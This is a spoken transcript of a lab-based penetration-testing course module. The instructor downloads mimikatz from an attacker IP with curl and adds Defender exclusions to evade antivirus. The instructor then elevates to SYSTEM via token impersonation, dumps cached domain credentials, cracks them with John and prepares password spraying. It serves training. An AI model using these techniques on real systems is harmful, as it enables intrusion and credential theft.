shouldn't take too much longer. And there we go. Choose privacy settings for this device. Let's go ahead and just disable these for the time being. Let's go ahead and just disable them and hit accept. Perfect. And we're in. So now we've got an RDP session. And what does that mean? That means we've got, if we go down here to, to the start menu, it's still loading. The machine it's chugging along. Oh, there we go. It's going. We click start. We can type in CMD. Remember, you can right click. We're running as the user siren, which is an administrator. So run as administrator. And we have a stable shell on the machine. Now we can CD back to where we were, Windows, tasks, type dir, -a-o-q, and here's our reverse shell.ps1. Excellent. Now we've compromised the machine and we have a shell on the machine. Additionally, we could, quite frankly, you can kick your feet back, you can relax, have some tea, whatever you like. Users. We've got all these users on here. Dremmy, look at that. Grix, Punks, there's us, Siren, and a user named Yardy, which is pretty awesome as well. So we've got all these users here. We're gonna close out of the Windows Explorer, and what we're gonna do is try and dump the credentials, or what's known as the MS cache, for those users. Now, how are we gonna do that? Might be thinking Siren. Okay, great, that sounds cool. Dumping an MS cache. We compromise the machine. We want to dump the credentials. How do I do that? Recall what I was saying about mimikatz. We need to get mimikatz transferred over. Is a file transfer capability present on this machine? You bet your butt it is. And guess what we have the ability to do? Set up an HTTP server. I'm going to locate mimikatz.exe on this machine. I'm going to find it in the x64 version of it. We're going to copy that. I'm going to hit copy, or I'm going to type copy to the present working directory. And actually, just to stay consistent, let's stay consistent here. Let's say we're working with a vulnerability or a payload, something like mimikatz. Let's do it from the vulnerabilities directory and use that as the directory that we serve from. And copy it to the present directory, list everything out. There's mimikatz. In all theory, right, we should be able to do a curl command and write it to Windows tasks. Now we're gonna run into an issue. Windows is clever, Windows is tricky. Windows is saying, there's no way you're gonna, even if you're an admin, I'm not letting you put mimikatz.exe on my operating system, on Windows. It's not gonna happen. But let me show you what ends up happening here. We're gonna type curl at HTTP, and we need to get our IP, so I am just going to type, quite frankly, my IP. You guessed it, that does like ifconfig on ton0 grep inet. So make sure you type ifconfig on ton0 and grab that IP. This is our attacking IP. You know what? We can type it 172.20.0.84. That's going to be different for you, but you're still going to be serving on port 8000. So now I'm going to start up, clear this all out, start up simple HTTP, and type /mimikatz.exe output to /mimikatz.exe. Now watch what happens here. We're going to curl it. It's going to download. This is a file transfer capability. It's going to do what it does. See, we get our code 200 there. That's good. That's good. That's good stuff. We can type directory. So you think there it is, you know? Let's go ahead and try and run mimikatz.exe. And we try to do that. Lo and behold, you know, virus and threat protection kicks in. The system cannot execute the specified program. Well, we're an admin on the machine. And we're going to do some pretty cool stuff here. What we're going to do is we're going to permit, as an admin, we're going to say it's okay to ignore the files that exist out of C Windows tasks. We're going to pull a Jedi mind tricks and say this is not the executable directory protection location that you're looking for. That's exactly what we're about to do here. Now, how do we do something like that? How do we do something like that? What we're going to do is drop back into PowerShell. Now we have a stable version of PowerShell. We have a PowerShell reverse shell through RDP, and it's stable. And we're going to say through PowerShell as an admin, add-mp preference-exclusion path. And in double quotes, we're going to exclude the path that we don't want. Like setting a policy, we want to exclude this path. We have tools in there, dev tools, whatever it is. Don't flag it, Windows. Don't flag it as, you know, malicious. You guessed it, C Windows tasks is going to be that directory. We're going to exclude that. And then we need to go one step further. Add mp preference, right? Dash exclusion. And now Windows is going to be like, okay, that's fine. You can exclude C Windows tasks, but you still need to specify an extension. All right. .exe. .executable. And from this point forward, now we can curl HTTP. Well, our attack, go back to your Kali machine. Remember our attacking IP 172.20.0.84 on port 8000/mimikatz.exe. And it's a little bit laggy. Michelle here is a little bit laggy, but -mimikatz.exe. Output is mimikatz.exe. And we've added that exclusion extension. So there we go. It's going to download, writing request stream, and we got a code 200. Now if we type ls, there's our binary, and we're kicking ass. There is one other command I like to type out of the gate other than net users. I swear there's another command that I like to type. And I'm going to teach you about it now before we drop into Mimikatz. Whoami is one command. We know who we are. But what, similar to on Linux, sudo-l for the current user. Similar to that, what's the equivalent on Windows for any extended permissibilities that a user might have? You can think of it like that. It's whoami/priv. And out of the gate, if we look through, these are all disabled. We have debug programs enabled. SC change notify privilege is enabled. And ooh, this is the killer right here for this machine. As far as system hardening is concerned, this machine has no integrity. Set impersonate privilege. Impersonate a client after authentication is set to enabled. We could use things like Juicy Potato or Mimikatz to escalate our privileges from an administrator to NT authority system or NT system authority. That's basically driver level, kernel level authority and privilege over a machine. That's the equivalent on Linux of UID is equal to 0. And that's exactly what we're going to do. we're going to enter mimikatz by typing ./mimikatz.exe. We're going to say privilege, debug, and then we're going to say token, because now we've enumerated this out, right? sc impersonate privilege, like an extended sudo capability. I'm going to say, okay, then token elevate bling bling. SID name NT authority system, because that's the thing. So with that being said, how do we get back to dumping that MS cache? Well, now that we have NT, it's a no-brainer. I mean, we have higher effective privileges over this machine than even the previous administrator had. If we really wanted to do some damage, well, let's just say it could easily be done. We could, this is where black hats could install malicious rootkits, ransomware, bad stuff, right? And as red teamers, as penetration testers, as white hat intruders, these are the types of things that we need to show and be able to demonstrate to a client. Like, look, this is how bad this is and how we can prevent it. Well, in a formal report, make sure if you ever took a screenshot of NT Authority system, you would include a full write-up on how you did it. And that was through the sc impersonate privilege, a little bit of lag there, but sc impersonate privilege token being enabled. Critical mistake. Absolutely critical mistake on behalf of the defense. Critical mistake. So we got privilege debug, we've got token elevate, now we're just ready to type LSA dump. : cache. And there we have it. These are the MS cache credentials for the users on the machine. Let's go ahead and exfiltrate these credentials. Where do we take these exfiltrated credentials now that we've got them on our clipboard? Well, we can go into exfil, touch a file called raw, nano raw, paste it in if we wanted to. And if this is if it wants to copy and paste, there it goes. A little bit laggy, but there it goes. And we can also, that's the raw version of it. Now we gotta load it up for something like John, a password cracking tool like John or Hashcat. Well, we're gonna be using John, so I'm gonna format this in just proper credential format, username, password, and specify to John that the type is MS cache 2. I'll show you how that's done. Let's just nano hashes and paste it all in. We can also terminate our simple HTTP server and exit out of that. And our RDP session we can bring down because it's terminator. We can just slide that right off. And we're gonna clean this up. See how it says, see how it says MS cache v2 for the user Yardi. You can hit Control K on your keyboard. Control K, Control K. The full username is technically kinetic /Yardi. Hint, hint, wink, wink, nudge, nudge. Let's go ahead and bring this over. But we're gonna bring this over in proper credential format. I just want nothing but the username and the password hash. So Control K, Control K. This is Grix, I can remember that, Grix. And we'll put in Grix. Same thing here, Dremmy, I can remember that as well. And we'll bring this over. Dremmy. And now we have a clean hashes file. It's done. From this point, Control XY enter. So now we're ready to move on to crack these hashes. If we cat hashes, they're here. And additionally, you can put them, I've taken the liberty of taking these, copying them, and pasting them into my cherry tree, because you know I like to keep my notation and everything great here, which we can return to if need be. But nonetheless, cat hashes, we've got them there. what we're going to do is run John on hashes -- format is equal to ms cache 2, and we're going to say the word list is equal to rocku.text. That's going to be in user share word list rocku.text. If you have to, you can, if this is the first time you're using Rocku, you can just do gzip-d and it'll deflate it. But let's go ahead and do that, and boom, we've got our cracked hashes. We're going to go ahead and copy these over and put these under the user's credentials. We no longer need the user hash format. We have proper credentials here. So what we're going to do is nano users, and we're going to put in Yardi. We're going to put in Grix and Dremmy, and then we're going to nano passwords and put in ice cream for Yardi. The next one on the list was pickle for Grix. It was pickle. And then we have Jaguar. Jaguar, correct. All right, no extra spaces, clean. And we also want to copy these passwords over to our master file. This is the important part, guys. Here's another takeaway. This is another important part of this massive lesson, right? But let's go back to our initial directory here. We want these users to be in the root, or from an organizational perspective, the root of the authorized range, which is the kinetic range, right? If we type ls-lsa, we have hashes here. We have a passwords file here with, remember, we cracked Vaughn's password as spellcaster, and we were able to get back into Active Directory with just Vaughn as an AD user. Well, now we've got extra credentials that we can spray across an entire range. So what are we going to do? We're going to nano our master passwords file, and we're going to put in ice cream, pickle, and the other was Jaguar, right? Jaguar. And then let's also add real users. These are confirmed users in our engagement that we can add. We have Yardi, we have Grix, and we have Dremmy. And you know, these are verified users along. We got some from an exfil, could have been Blackmagic. Pete or PETE could have been one, but we know this is where all of our potential users and verified users go, because we want to be able to check passwords across a variety of users as well, or potential users, to give ourselves the maximum potential across an attack surface to actually compromise it, right? So with that being said, we're basically ready to clear out the screen here. And wow, that was quite the session. We've got everything from Active Directory with Bloodhound to Neo4j being configured to a maintained persistent and NT system authority shell on the remote machine. I mean, goodness gracious, this has been quite a module here in Module 9 with Slayer Labs. And in the next module, we'll be kind of moving forward with actually compromising the domain. We're going to be looking into, like, look, this is where we could have branched out. The reason I went into this is because you have two options from this point. You either go down the route of finding the machines that, you know, like Jane is on, like right click and shortest paths to Jane, right? Well, we would need to compromise kinetic.corp, right? Or, and so on and so forth to be able to access Jane. We would need to be able to, I mean, obviously she's got control over all of this. We either need to compromise DC kinetic.corp, basically to get access to Jane. And we need access to Jane. So there's two methods of really going on once you get Bloodhound open here. You can take the shortest path to high value targets, which I do encourage, which is what we're doing. But alongside that, we can also go after the real users on the machine, or not on the machine, but in this network, or in the kinetic.corp range, right? And that can mean going after independent machines and retrieving those credentials, maintaining access, dumping those credentials, so on and so forth. And don't forget that whoami/priv. That could come in handy. Well, in here, whoami/priv. That could always come in handy. So don't forget that while going through the range. Every machine that you compromise is gonna help make you a more effective penetration tester. Just keep working on this methodology. Speaking of the methodology, we have a lot here. I can kind of, on this machine, the 2 try list, we went through it, but what would I have put here if I was an absolute beginner? I would have put free switch there. Free switch, looking for vulnerabilities on Google and so on and so forth, but I saved you the time there because we want to look for verified weaponized code first through Searchsploit, looking at the exploit database, and then we can look at GitHub repos for things like GitHub, on Google tying in GitHub and POC, or searching for GitHub POC or proof of concept, or the CVE, POC, things like that, right? So we managed to compromise this machine through free switch remote code execution. We transferred. What else did we do? We transferred a reverse shell, a reverse PowerShell, or a reverse malicious PowerShell script, which is in the resources. We utilized WinPost, that is a Bash alias, to the flat file reference system for Windows Post-Exploitation Enumeration, and that will be in the resources. Aside from that, we opened up RDP on the machine. We added ourselves. This would go before that. We added ourselves as a local system administrator. We opened up RDP on the machine. We RDP'd into the machine to get a stable shell, and utilized a stable PowerShell terminal to basically add execution policies and bypass checks for executable binaries in C Windows tasks. We did a lot. What else did we do? whoami/priv, the impersonate token. We were able then to transfer mimikatz, execute mimikatz, exfiltrate credentials, MS cache credentials from the machine, crack those credentials on Kali, and we've done quite a lot here in Module 9, and we've learned quite a lot. So guys, my name is Siren here with Startup.Security. It is my hope that you had a significant amount of takeaway from this module, and I will catch you in Module 10, where we take on the actual domain controller, DC Kinetic, and we go straight for not Rocks, but Jane. In fact, Jane is our target. Catch you in the next module.